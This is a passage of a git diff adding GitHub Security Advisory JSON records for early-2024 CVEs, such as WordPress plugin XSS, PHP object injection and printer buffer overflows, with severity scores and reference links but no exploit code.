Search Replace plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.4.4 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6933" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/better-search-replace/trunk/includes/class-bsr-db.php#L334" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3023674/better-search-replace/trunk/includes/class-bsr-db.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/895f2db1-a2ed-4a17-a4f6-cd13ee8f84af?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8j45-r236-3q9q/GHSA-8j45-r236-3q9q.json b/advisories/unreviewed/2024/02/GHSA-8j45-r236-3q9q/GHSA-8j45-r236-3q9q.json new file mode 100644 index 0000000000000..8588b4a5e4c0c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8j45-r236-3q9q/GHSA-8j45-r236-3q9q.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8j45-r236-3q9q", + "modified": "2024-02-05T09:30:28Z", + "published": "2024-02-05T09:30:28Z", + "aliases": [ + "CVE-2024-24859" + ], + "details": "A race condition was found in the Linux kernel's net/bluetooth in sniff_{min,max}_interval_set() function. This can result in a bluetooth sniffing exception issue, possibly leading denial of service.\n\n\n\n\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24859" + }, + { + "type": "WEB", + "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8153" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-362" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T08:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8jj6-7vgp-rg47/GHSA-8jj6-7vgp-rg47.json b/advisories/unreviewed/2024/02/GHSA-8jj6-7vgp-rg47/GHSA-8jj6-7vgp-rg47.json new file mode 100644 index 0000000000000..5ad721cc38e05 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8jj6-7vgp-rg47/GHSA-8jj6-7vgp-rg47.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8jj6-7vgp-rg47", + "modified": "2024-02-08T00:32:19Z", + "published": "2024-02-08T00:32:19Z", + "aliases": [ + "CVE-2023-6840" + ], + "details": "An issue has been discovered in GitLab EE affecting all versions from 16.4 prior to 16.6.7, 16.7 prior to 16.7.5, and 16.8 prior to 16.8.2 which allows a maintainer to change the name of a protected branch that bypasses the security policy added to block MR.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6840" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/2280292" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/435500" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T22:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8jw8-7cq8-7qcf/GHSA-8jw8-7cq8-7qcf.json b/advisories/unreviewed/2024/02/GHSA-8jw8-7cq8-7qcf/GHSA-8jw8-7cq8-7qcf.json new file mode 100644 index 0000000000000..6ab7e8eff7236 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8jw8-7cq8-7qcf/GHSA-8jw8-7cq8-7qcf.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8jw8-7cq8-7qcf", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0834" + ], + "details": "The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the link_to parameter in all versions up to, and including, 1.12.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0834" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/price-table/widgets/price-table.php#L784" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3031349%40addon-elements-for-elementor-page-builder&new=3031349%40addon-elements-for-elementor-page-builder&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6ebb5654-ba3e-4f18-8720-a6595a771964?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8pj9-c2gq-jhw8/GHSA-8pj9-c2gq-jhw8.json b/advisories/unreviewed/2024/02/GHSA-8pj9-c2gq-jhw8/GHSA-8pj9-c2gq-jhw8.json new file mode 100644 index 0000000000000..43054838ce87d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8pj9-c2gq-jhw8/GHSA-8pj9-c2gq-jhw8.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8pj9-c2gq-jhw8", + "modified": "2024-02-06T21:30:26Z", + "published": "2024-02-06T21:30:26Z", + "aliases": [ + "CVE-2024-1258" + ], + "details": "A vulnerability was found in Juanpao JPShop up to 1.5.02. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file api/config/params.php of the component API. The manipulation of the argument JWT_KEY_ADMIN leads to use of hard-coded cryptographic key\n . The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-252997 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1258" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/XblX1My7jNV7" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252997" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252997" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-321" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8r33-q5j5-rh7g/GHSA-8r33-q5j5-rh7g.json b/advisories/unreviewed/2024/02/GHSA-8r33-q5j5-rh7g/GHSA-8r33-q5j5-rh7g.json new file mode 100644 index 0000000000000..dc8087e3d89a0 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8r33-q5j5-rh7g/GHSA-8r33-q5j5-rh7g.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8r33-q5j5-rh7g", + "modified": "2024-02-08T00:32:19Z", + "published": "2024-02-08T00:32:19Z", + "aliases": [ + "CVE-2024-23448" + ], + "details": "An issue was discovered whereby APM Server could log at ERROR level, a response from Elasticsearch indicating that indexing the document failed and that response would contain parts of the original document. Depending on the nature of the document that the APM Server attempted to ingest, this could lead to the insertion of sensitive or private information in the APM Server logs.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23448" + }, + { + "type": "WEB", + "url": "https://discuss.elastic.co/t/apm-server-8-12-1-security-update-esa-2024-03/352688" + }, + { + "type": "WEB", + "url": "https://www.elastic.co/community/security" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T22:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8rwf-rv67-3ch6/GHSA-8rwf-rv67-3ch6.json b/advisories/unreviewed/2024/02/GHSA-8rwf-rv67-3ch6/GHSA-8rwf-rv67-3ch6.json new file mode 100644 index 0000000000000..b39ed64f80fb5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8rwf-rv67-3ch6/GHSA-8rwf-rv67-3ch6.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8rwf-rv67-3ch6", + "modified": "2024-02-02T18:30:30Z", + "published": "2024-02-02T00:31:27Z", + "aliases": [ + "CVE-2024-23033" + ], + "details": "Cross Site Scripting vulnerability in the path parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23033" + }, + { + "type": "WEB", + "url": "https://github.com/weng-xianhu/eyoucms/issues/57" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T23:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8vw5-wvh5-q977/GHSA-8vw5-wvh5-q977.json b/advisories/unreviewed/2024/02/GHSA-8vw5-wvh5-q977/GHSA-8vw5-wvh5-q977.json new file mode 100644 index 0000000000000..49fcd355750bf --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8vw5-wvh5-q977/GHSA-8vw5-wvh5-q977.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8vw5-wvh5-q977", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-20827" + ], + "details": "Improper access control vulnerability in Samsung Gallery prior to version 14.5.04.4 allows physical attackers to access the picture using physical keyboard on the lockscreen.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20827" + }, + { + "type": "WEB", + "url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T03:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8w8f-cg25-c89c/GHSA-8w8f-cg25-c89c.json b/advisories/unreviewed/2024/02/GHSA-8w8f-cg25-c89c/GHSA-8w8f-cg25-c89c.json new file mode 100644 index 0000000000000..c930e5f42d785 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8w8f-cg25-c89c/GHSA-8w8f-cg25-c89c.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8w8f-cg25-c89c", + "modified": "2024-02-07T09:30:31Z", + "published": "2024-02-07T09:30:31Z", + "aliases": [ + "CVE-2024-24311" + ], + "details": "Path Traversal vulnerability in Linea Grafica \"Multilingual and Multistore Sitemap Pro - SEO\" (lgsitemaps) module for PrestaShop before version 1.6.6, a guest can download personal information without restriction.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24311" + }, + { + "type": "WEB", + "url": "https://security.friendsofpresta.org/modules/2024/02/06/lgsitemaps.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T09:15:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8xmq-whfm-pq37/GHSA-8xmq-whfm-pq37.json b/advisories/unreviewed/2024/02/GHSA-8xmq-whfm-pq37/GHSA-8xmq-whfm-pq37.json new file mode 100644 index 0000000000000..3d83b098f42d5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8xmq-whfm-pq37/GHSA-8xmq-whfm-pq37.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8xmq-whfm-pq37", + "modified": "2024-02-06T21:30:26Z", + "published": "2024-02-06T21:30:26Z", + "aliases": [ + "CVE-2024-22237" + ], + "details": "Aria Operations for Networks contains a local privilege escalation vulnerability. A console user with access to Aria Operations for Networks may exploit this vulnerability to escalate privileges to gain root access to the system. ", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22237" + }, + { + "type": "WEB", + "url": "https://www.vmware.com/security/advisories/VMSA-2024-0002.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T20:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8xpr-jq7w-573j/GHSA-8xpr-jq7w-573j.json b/advisories/unreviewed/2024/02/GHSA-8xpr-jq7w-573j/GHSA-8xpr-jq7w-573j.json new file mode 100644 index 0000000000000..d1d140ee9d079 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8xpr-jq7w-573j/GHSA-8xpr-jq7w-573j.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8xpr-jq7w-573j", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2023-6234" + ], + "details": "Buffer overflow in CPCA Color LUT Resource Download process of Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code.*: Satera LBP670C Series/Satera MF750C Series firmware v03.07 and earlier sold in Japan. Color imageCLASS LBP674C/Color imageCLASS X LBP1333C/Color imageCLASS MF750C Series/Color imageCLASS X MF1333C Series firmware v03.07 and earlier sold in US. i-SENSYS LBP673Cdw/C1333P/i-SENSYS MF750C Series/C1333i Series firmware v03.07 and earlier sold in Europe.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6234" + }, + { + "type": "WEB", + "url": "https://canon.jp/support/support-info/240205vulnerability-response" + }, + { + "type": "WEB", + "url": "https://psirt.canon/advisory-information/cp2024-001/" + }, + { + "type": "WEB", + "url": "https://www.canon-europe.com/support/product-security-latest-news/" + }, + { + "type": "WEB", + "url": "https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Vulnerability-Measure-Against-Buffer-Overflow-for-Laser-Printers-and-Small-Office-Multifunctional-Printers" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T01:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-934w-fhc8-qwcj/GHSA-934w-fhc8-qwcj.json b/advisories/unreviewed/2024/02/GHSA-934w-fhc8-qwcj/GHSA-934w-fhc8-qwcj.json new file mode 100644 index 0000000000000..1d64a25c4b6d7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-934w-fhc8-qwcj/GHSA-934w-fhc8-qwcj.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-934w-fhc8-qwcj", + "modified": "2024-02-06T09:31:38Z", + "published": "2024-02-06T09:31:38Z", + "aliases": [ + "CVE-2023-32454" + ], + "details": "\nDUP framework version 4.9.4.36 and prior contains insecure operation on Windows junction/Mount point vulnerability. A local malicious standard user could exploit the vulnerability to create arbitrary files, leading to denial of service\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32454" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000216236/dsa-2023-192" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1386" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T08:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-936g-qj35-5658/GHSA-936g-qj35-5658.json b/advisories/unreviewed/2024/02/GHSA-936g-qj35-5658/GHSA-936g-qj35-5658.json new file mode 100644 index 0000000000000..a4447d5032b2b --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-936g-qj35-5658/GHSA-936g-qj35-5658.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-936g-qj35-5658", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-02T00:31:28Z", + "aliases": [ + "CVE-2024-21794" + ], + "details": "In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, an attacker can redirect users to malicious pages through the login page.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21794" + }, + { + "type": "WEB", + "url": "https://rapidscada.org/contact/" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-601" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T00:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-94f4-228x-55q7/GHSA-94f4-228x-55q7.json b/advisories/unreviewed/2024/02/GHSA-94f4-228x-55q7/GHSA-94f4-228x-55q7.json new file mode 100644 index 0000000000000..6ec4f74de340b --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-94f4-228x-55q7/GHSA-94f4-228x-55q7.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-94f4-228x-55q7", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-20817" + ], + "details": "Out out bounds Write vulnerabilities in svc1td_vld_slh of libsthmbc.so prior to SMR Feb-2024 Release 1 allows local attackers to trigger buffer overflow.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20817" + }, + { + "type": "WEB", + "url": "https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T03:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-959v-9j99-99w5/GHSA-959v-9j99-99w5.json b/advisories/unreviewed/2024/02/GHSA-959v-9j99-99w5/GHSA-959v-9j99-99w5.json new file mode 100644 index 0000000000000..c24f461de134e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-959v-9j99-99w5/GHSA-959v-9j99-99w5.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-959v-9j99-99w5", + "modified": "2024-02-06T09:31:38Z", + "published": "2024-02-06T09:31:38Z", + "aliases": [ + "CVE-2023-32474" + ], + "details": "\nDell Display Manager application, version 2.1.1.17 and prior, contain an insecure operation on windows junction/mount point. A local malicious user could potentially exploit this vulnerability during installation leading to arbitrary folder or file deletion\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32474" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000215216/dsa-2023-182-dell" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1386" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T08:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-967w-7xjc-4wqj/GHSA-967w-7xjc-4wqj.json b/advisories/unreviewed/2024/02/GHSA-967w-7xjc-4wqj/GHSA-967w-7xjc-4wqj.json new file mode 100644 index 0000000000000..4ea63baf3be3c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-967w-7xjc-4wqj/GHSA-967w-7xjc-4wqj.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-967w-7xjc-4wqj", + "modified": "2024-02-07T06:35:21Z", + "published": "2024-02-07T06:35:21Z", + "aliases": [ + "CVE-2024-23446" + ], + "details": "An issue was discovered by Elastic, whereby the Detection Engine Search API does not respect Document-level security (DLS) or Field-level security (FLS) when querying the .alerts-security.alerts-{space_id} indices. Users who are authorized to call this API may obtain unauthorized access to documents if their roles are configured with DLS or FLS against the aforementioned index.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23446" + }, + { + "type": "WEB", + "url": "https://discuss.elastic.co/t/kibana-8-12-1-security-update-esa-2024-01/352686" + }, + { + "type": "WEB", + "url": "https://www.elastic.co/community/security" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T04:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-97fg-5ggq-j35p/GHSA-97fg-5ggq-j35p.json b/advisories/unreviewed/2024/02/GHSA-97fg-5ggq-j35p/GHSA-97fg-5ggq-j35p.json new file mode 100644 index 0000000000000..07501c947ad0a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-97fg-5ggq-j35p/GHSA-97fg-5ggq-j35p.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-97fg-5ggq-j35p", + "modified": "2024-02-02T06:30:31Z", + "published": "2024-02-02T06:30:31Z", + "aliases": [ + "CVE-2022-40744" + ], + "details": "IBM Aspera Faspex 5.0.6 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 236441.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-40744" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/236441" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7111778" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T04:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-97rx-wgvh-p56f/GHSA-97rx-wgvh-p56f.json b/advisories/unreviewed/2024/02/GHSA-97rx-wgvh-p56f/GHSA-97rx-wgvh-p56f.json new file mode 100644 index 0000000000000..8bec38ee9355a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-97rx-wgvh-p56f/GHSA-97rx-wgvh-p56f.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-97rx-wgvh-p56f", + "modified": "2024-02-05T06:30:31Z", + "published": "2024-02-05T06:30:31Z", + "aliases": [ + "CVE-2024-24866" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Biteship Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo allows Reflected XSS.This issue affects Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo: from n/a through 2.2.24.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24866" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/biteship/wordpress-biteship-plugin-2-2-24-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T06:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-97vr-j4hr-qrq8/GHSA-97vr-j4hr-qrq8.json b/advisories/unreviewed/2024/02/GHSA-97vr-j4hr-qrq8/GHSA-97vr-j4hr-qrq8.json new file mode 100644 index 0000000000000..001a01a7947e2 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-97vr-j4hr-qrq8/GHSA-97vr-j4hr-qrq8.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-97vr-j4hr-qrq8", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2024-22902" + ], + "details": "Vinchin Backup & Recovery v7.2 was discovered to be configured with default root credentials.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22902" + }, + { + "type": "WEB", + "url": "https://blog.leakix.net/2024/01/vinchin-backup-rce-chain/" + }, + { + "type": "WEB", + "url": "https://seclists.org/fulldisclosure/2024/Jan/31" + }, + { + "type": "WEB", + "url": "http://default.com" + }, + { + "type": "WEB", + "url": "http://vinchin.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T02:15:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-987x-54mh-g54g/GHSA-987x-54mh-g54g.json b/advisories/unreviewed/2024/02/GHSA-987x-54mh-g54g/GHSA-987x-54mh-g54g.json new file mode 100644 index 0000000000000..ff436fea400cb --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-987x-54mh-g54g/GHSA-987x-54mh-g54g.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-987x-54mh-g54g", + "modified": "2024-02-05T06:30:31Z", + "published": "2024-02-05T06:30:31Z", + "aliases": [ + "CVE-2024-20002" + ], + "details": "In TVAPI, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: DTV03961715; Issue ID: DTV03961715.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20002" + }, + { + "type": "WEB", + "url": 